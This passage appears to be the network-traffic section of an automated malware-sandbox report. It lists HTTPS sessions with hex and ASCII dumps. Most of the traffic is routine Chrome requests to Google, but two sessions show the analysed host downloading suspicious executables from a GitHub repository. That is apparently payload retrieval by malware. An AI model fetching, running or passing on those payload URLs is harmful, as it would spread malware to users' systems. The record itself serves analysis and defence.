                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC1390INData Raw: 59 32 61 77 73 72 71 59 57 6c 56 5a 6d 75 77 47 71 41 71 39 50 44 4c 77 68 6a 57 37 48 4f 77 6d 55 75 73 38 79 54 73 47 41 55 46 76 4c 35 38 34 63 50 6e 7a 34 2b 38 42 7a 2f 6b 57 34 4c 43 64 62 2b 35 6d 61 68 67 4d 5a 61 79 4f 57 6f 73 62 4c 5a 46 33 30 53 32 72 68 66 70 68 59 57 49 53 46 58 7a 2f 66 43 69 6c 42 78 4f 68 33 2b 72 57 6e 46 4f 73 76 59 4f 52 69 6a 65 33 7a 45 34 73 4c 36 79 72 4c 51 55 35 38 2b 4d 4b 77 48 67 6e 58 45 73 41 34 58 79 52 58 75 43 58 4e 75 4a 76 75 76 6b 33 32 35 75 77 61 62 73 32 2f 66 66 30 77 64 73 4c 69 77 37 72 75 50 33 51 48 42 34 72 59 53 57 67 78 4c 5a 45 6c 6e 45 53 77 4b 77 7a 49 4c 4b 78 76 66 75 6c 2b 47 73 42 70 50 74 51 5a 59 61 56 6b 66 34 49 71 41 34 64 4b 77 4c 6e 56 6a 53 57 47 35 4c 2f 6b 6b 74 50 6e 4a 7a
                                                                                                                                                                                                                                                            Data Ascii: Y2awsrqYWlVZmuwGqAq9PDLwhjW7HOwmUus8yTsGAUFvL584cPnz4+8Bz/kW4LCdb+5mahgMZayOWosbLZF30S2rhfphYWISFXz/fCilBxOh3+rWnFOsvYORije3zE4sL6yrLQU58+MKwHgnXEsA4XyRXuCXNuJvuvk325uwabs2/ff0wdsLiw7ruP3QHB4rYSWgxLZElnESwKwzILKxvful+GsBpPtQZYaVkf4IqA4dKwLnVjSWG5L/kktPnJz
                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC1390INData Raw: 58 57 67 31 59 53 30 44 56 2b 45 6a 34 46 53 74 47 61 34 74 58 72 35 2b 35 63 71 56 47 7a 63 37 68 4a 58 57 6b 36 78 31 53 5a 47 7a 62 75 38 34 55 6e 6d 78 59 6a 50 42 36 57 41 77 37 4a 2b 61 6c 48 6f 6c 69 45 56 76 63 75 70 35 78 65 6b 76 35 49 42 6d 73 2b 5a 69 65 59 4f 2b 73 62 34 7a 2f 4a 71 50 73 78 41 72 55 75 6e 37 41 76 6b 64 54 34 58 43 69 68 57 42 30 4c 4c 52 72 35 75 4f 51 32 44 74 6b 45 78 43 38 4d 72 6e 63 36 75 37 79 61 74 62 74 31 75 34 6f 31 6f 7a 6e 4c 2f 73 76 33 35 35 38 66 4c 64 38 4b 52 4b 6e 6c 45 72 57 30 52 76 75 6c 4e 72 66 52 65 4a 4e 65 4f 4c 68 67 4a 75 64 38 41 64 63 45 6f 6e 49 54 34 74 67 34 45 46 58 72 46 36 41 31 67 6c 4d 69 75 56 77 73 6a 53 47 51 42 47 75 6d 52 4e 79 43 51 57 4c 78 62 66 59 75 48 32 37 6d 68 34 70 62 46
                                                                                                                                                                                                                                                            Data Ascii: XWg1YS0DV+Ej4FStGa4tXr5+5cqVGzc7hJXWk6x1SZGzbu84UnmxYjPB6WAw7J+alHoliEVvcup5xekv5IBms+ZieYO+sb4z/JqPsxArUun7AvkdT4XCihWB0LLRr5uOQ2DtkExC8Mrnc6u7yatbt1u4o1oznL/sv3558fLd8KRKnlErW0RvulNrfReJNeOLhgJud8AdcEonIT4tg4EFXrF6A1glMiuVwsjSGQBGumRNyCQWLxbfYuH27mh4pbF
                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC1390INData Raw: 48 44 39 74 6d 32 59 79 64 4f 6b 41 43 71 6f 62 54 65 4e 6e 56 49 59 77 45 46 52 53 49 62 41 67 6c 42 58 45 6d 61 4c 50 75 63 4f 32 50 4c 53 56 4b 43 53 45 7a 69 53 6b 33 77 55 6b 6b 56 6d 36 77 4a 77 59 42 68 55 7a 71 79 54 52 35 6b 7a 55 77 67 58 63 67 36 52 6a 6f 67 47 39 33 2f 31 66 66 75 64 33 35 35 50 74 74 6e 32 33 56 53 2b 50 37 4f 46 34 51 55 51 61 78 50 50 75 2f 35 33 65 2f 73 42 37 2b 50 61 49 6d 33 43 36 78 61 57 44 6b 63 6c 59 6a 5a 6a 57 36 72 53 61 36 75 31 49 64 71 65 6a 34 57 53 34 38 4d 42 79 55 59 56 51 33 42 72 71 7a 59 46 4f 42 56 72 34 46 50 74 39 74 6a 38 57 6c 44 44 46 72 33 57 63 37 56 6e 41 56 59 77 6c 69 38 78 61 71 61 59 37 45 6d 36 34 66 4c 45 49 48 57 75 58 4d 77 48 59 55 72 68 45 4a 59 67 7a 38 52 58 42 46 59 2f 50 71 7a 6f
                                                                                                                                                                                                                                                            Data Ascii: HD9tm2YydOkACqobTeNnVIYwEFRSIbAglBXEmaLPucO2PLSVKCSEziSk3wUkkVm6wJwYBhUzqyTR5kzUwgXcg6RjogG93/1ffud355Pttn23VS+P7OF4QUQaxPPu/53e/sB7+PaIm3C6xaWDkclYjZjW6rSa6u1Idqej4WS48MByUYVQ3BrqzYFOBVr4FPt9tj8WlDDFr3Wc7VnAVYwli8xaqaY7Em64fLEIHWuXMwHYUrhEJYgz8RXBFY/Pqzo
                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC1390INData Raw: 45 33 52 37 65 6f 48 58 77 66 62 42 59 72 56 77 39 4f 4b 70 79 7a 57 35 77 72 6b 44 46 73 61 54 31 73 4a 43 72 50 67 67 61 37 76 4c 69 68 4a 59 75 72 43 57 7a 77 74 68 4d 61 36 59 73 44 42 78 6f 4d 70 74 54 41 52 68 41 4c 38 45 6c 77 77 74 6a 49 55 70 63 2f 58 41 42 4a 62 38 47 4d 43 36 65 58 50 74 4d 65 30 43 61 41 44 57 55 51 49 4c 36 6d 78 68 6c 37 67 79 73 45 4b 51 41 4b 75 41 4d 39 41 56 38 47 4b 36 42 46 74 75 76 66 64 43 62 54 55 67 36 2f 42 30 74 61 34 57 51 71 31 63 38 77 76 61 51 77 76 6b 71 33 5a 4c 49 52 6c 4c 67 41 57 58 64 4b 34 61 5a 57 39 38 66 41 61 53 32 65 5a 71 45 55 69 62 70 58 73 70 61 74 2b 6b 51 37 55 51 34 2b 5a 64 6c 75 6a 65 4d 57 4f 6c 44 2b 46 63 4b 70 57 57 42 34 36 62 75 57 4a 76 32 41 43 6e 37 52 37 33 71 7a 38 76 33 62 36
                                                                                                                                                                                                                                                            Data Ascii: E3R7eoHXwfbBYrVw9OKpyzW5wrkDFsaT1sJCrPgga7vLihJYurCWzwthMa6YsDBxoMptTARhAL8ElwwtjIUpc/XABJb8GMC6eXPtMe0CaADWUQIL6mxhl7gysEKQAKuAM9AV8GK6BFtuvfdCbTUg6/B0ta4WQq1c8wvaQwvkq3ZLIRlLgAWXdK4aZW98fAaS2eZqEUibpXspat+kQ7UQ4+ZdlujeMWOlD+FcKpWWB46buWJv2ACn7R73qz8v3b6
                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC1390INData Raw: 32 2b 4d 6a 56 59 76 42 4b 61 6c 4d 58 61 72 44 4a 61 2b 56 77 65 65 53 4b 71 7a 4f 30 56 67 53 55 31 6e 34 4a 4b 75 69 4b 77 45 74 69 37 74 78 66 38 74 34 31 5a 37 79 36 41 68 52 74 6b 4d 4e 69 32 47 31 57 77 39 36 74 65 55 33 72 38 50 63 69 57 74 31 76 76 74 4f 43 70 41 72 68 34 30 30 44 43 4d 6f 46 31 35 59 7a 55 6f 63 69 76 74 72 61 32 76 74 44 2b 61 35 4d 4b 71 57 53 34 36 64 65 46 69 42 5a 74 39 78 50 43 75 67 42 4c 31 45 52 64 56 37 39 6b 37 32 78 72 4a 61 77 61 58 52 61 58 56 72 2b 4b 59 48 46 5a 45 56 63 43 4c 52 75 39 49 6d 77 36 43 74 65 56 41 56 5a 42 53 30 70 76 63 6c 67 6c 46 4e 64 78 73 41 77 47 50 74 4f 78 45 6e 6e 52 32 34 66 4c 41 45 74 48 43 2b 4c 7a 34 67 4b 75 33 48 61 33 33 55 78 57 45 49 51 46 59 57 44 46 70 45 37 6c 78 52 5a 6b 38
                                                                                                                                                                                                                                                            Data Ascii: 2+MjVYvBKalMXarDJa+VweeSKqzO0VgSU1n4JKuiKwEti7txf8t41Z7y6AhRtkMNi2G1Ww96teU3r8PciWt1vvtOCpArh400DCMoF15YzUocivtra2vtD+a5MKqWS46deFiBZt9xPCugBL1ERdV79k72xrJawaXRaXVr+KYHFZEVcCLRu9Imw6CteVAVZBS0pvclglFNdxsAwGPtOxEnnR24fLAEtHC+Lz4gKu3Ha33UxWEIQFYWDFpE7lxRZk8


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            85192.168.2.450113142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:56 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:57 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:57 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-5v19dPZKYmWTY4zJKmUqew' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:19:57 UTC124INData Raw: 33 34 33 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 61 69 72 20 6a 6f 72 64 61 6e 20 31 20 74 72 61 76 69 73 20 73 63 6f 74 74 20 76 65 6c 76 65 74 20 62 72 6f 77 6e 22 2c 22 6d 63 64 6f 6e 61 6c 64 5c 75 30 30 32 37 73 20 6d 65 6e 75 20 32 30 32 35 22 2c 22 6d 69 6c 69 74 61 72 79 20 68 65 6c 69 63 6f 70 74 65 72 20 63 72 61 73 68 20 63 61 6d 70 20 70 65 6e 64 6c 65 74 6f
                                                                                                                                                                                                                                                            Data Ascii: 343)]}'["",["air jordan 1 travis scott velvet brown","mcdonald\u0027s menu 2025","military helicopter crash camp pendleto
                                                                                                                                                                                                                                                            2024-12-21 21:19:57 UTC718INData Raw: 6e 22 2c 22 6e 79 20 72 61 6e 67 65 72 73 20 74 72 61 64 65 22 2c 22 74 66 32 20 63 6f 6d 69 63 73 22 2c 22 77 6f 72 64 6c 65 20 61 6e 73 77 65 72 20 64 65 63 65 6d 62 65 72 20 32 31 22 2c 22 67 72 69 6d 73 6c 65 79 20 66 6f 6f 74 62 61 6c 6c 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 22 2c 22 69 72 73 20 73 65 6e 64 69 6e 67 20 73 74 69 6d 75 6c 75 73 20 63 68 65 63 6b 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e
                                                                                                                                                                                                                                                            Data Ascii: n","ny rangers trade","tf2 comics","wordle answer december 21","grimsley football championship","irs sending stimulus checks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmN
                                                                                                                                                                                                                                                            2024-12-21 21:19:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            86192.168.2.450112142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:56 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            87192.168.2.45011720.233.83.145443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:57 UTC111OUTGET /Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: github.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-12-21 21:19:58 UTC562INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Server: GitHub.com
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                            Location: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/ktyihkdfesf.exe
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                            2024-12-21 21:19:58 UTC3380INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            88192.168.2.45011820.233.83.145443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:57 UTC111OUTGET /Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: github.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-12-21 21:19:58 UTC562INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Server: GitHub.com
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:58 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                            Location: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/biyjdfjadaw.exe
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                            2024-12-21 21:19:58 UTC3380INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            89192.168.2.450123142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:58 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:59 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            90192.168.2.450122142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:58 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:59 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
